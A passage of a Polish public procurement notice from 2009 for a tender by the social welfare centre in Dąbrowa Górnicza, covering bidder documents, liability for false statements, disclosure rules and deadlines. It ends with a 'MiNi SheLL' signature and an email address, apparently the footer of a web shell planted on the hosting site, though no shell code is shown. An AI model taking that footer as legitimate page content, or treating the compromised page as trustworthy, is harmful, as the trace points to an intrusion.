6.1  Zamiast  dokumentów , o których mowa w rozdziale VI   pkt 1 SIWZ składa dokument lub dokumenty , wystawione w kraju, w którym  ma siedzibę  lub miejsce  zamieszkania , potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec niego zakazu ubiegania się  o zamówienie.
6. 2   Jeżeli w kraju pochodzenia osoby lub  w kraju, w którym  Wykonawca  ma siedzibę  lub miejsce  zamieszkania , nie wydaje się dokumentów , o których mowa w rozdz. VI. pkt 1  zastępuje się je  dokumentem   zawierającym  oświadczenie złożone przed notariuszem , właściwym organem sądowym, administracyjnym albo organem  samorządu  zawodowego lub gospodarczego  odpowiednio  kraju pochodzenia  osoby  lub kraju , w którym  Wykonawca  ma siedzibę  lub miejsce zamieszkania wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.
6.3 Dokumenty są składane w formie oryginału  lub kopii poświadczonej  za zgodność  z oryginałem  przez Wykonawcę . 
6.4 Dokumenty sporządzone w języku obcym Wykonawca dostarcza  wraz z tłumaczeniem  na język polski poświadczonym  przez Wykonawcę.
7.Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną /dotyczącą składania nieprawdziwych zeznań i oświadczeń / wynikającą z art. 297 KK. W razie stwierdzenia, że złożone przez dostawcę lub wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 KPK - zawiadomi o tym fakcie właściwy organ ścigania.
8. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń, zgodnie z art. 24 ust. 2 pkt 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych spowoduje wykluczenie go z postępowania.
9.  Załączone oświadczenia  winny posiadać daty  wystawienia dokumentu świadczące o ich ważności określone w rozdz. VI  niniejszej specyfikacji.
10. Oferty, opinie biegłych, oświadczenia, zawiadomienia, wnioski, inne  dokumenty i informacje składane przez Zamawiającego i wykonawców oraz umowa w sprawie zamówienia publicznego stanowią załączniki do protokołu.
11. Pod używanym w nin. SIWZ pojęciem -oferta- rozumie się ofertę właściwą tj. wypełniony i prawidłowo podpisany formularz OFERTA będący załącznikiem nr 1 do specyfikacji istotnych warunków zamówienia, a także dokumenty wymagane zgodnie z  artykułem 44 ustawy Prawo zamówień publicznych potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu. Dokumenty te wymieniono enumeratywnie w rozdz. VI nin. SIWZ. Wykonawca aby wziąć udział w niniejszym postępowaniu przetargowym winien złożyć ofertę właściwą i komplet dokumentów podanych w rozdz. VI SIWZ, potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w rozdz. V niniejszej SIWZ.
12. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu postępowania, z tym że oferty są jawne od chwili ich otwarcia, a wnioski o dopuszczenie  do udziału w postępowaniu po upływie terminu ich składania.
13. Nie ujawnia się informacji  stanowiących tajemnicę  przedsiębiorstwa  w rozumieniu  przepisów  o zwalczaniu  nieuczciwej konkurencji , jeżeli  Wykonawca  nie później  niż w terminie   składania ofert zastrzegł , że  nie mogą  one być  udostępnione. Wykonawca nie może zastrzec informacji , o których mowa  w art.86 ust.4 ustawy Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 16 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2009 godzina 10:30, miejsce: Miejskie Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 16 
41-300 Dąbrowa Górnicza.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 13.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com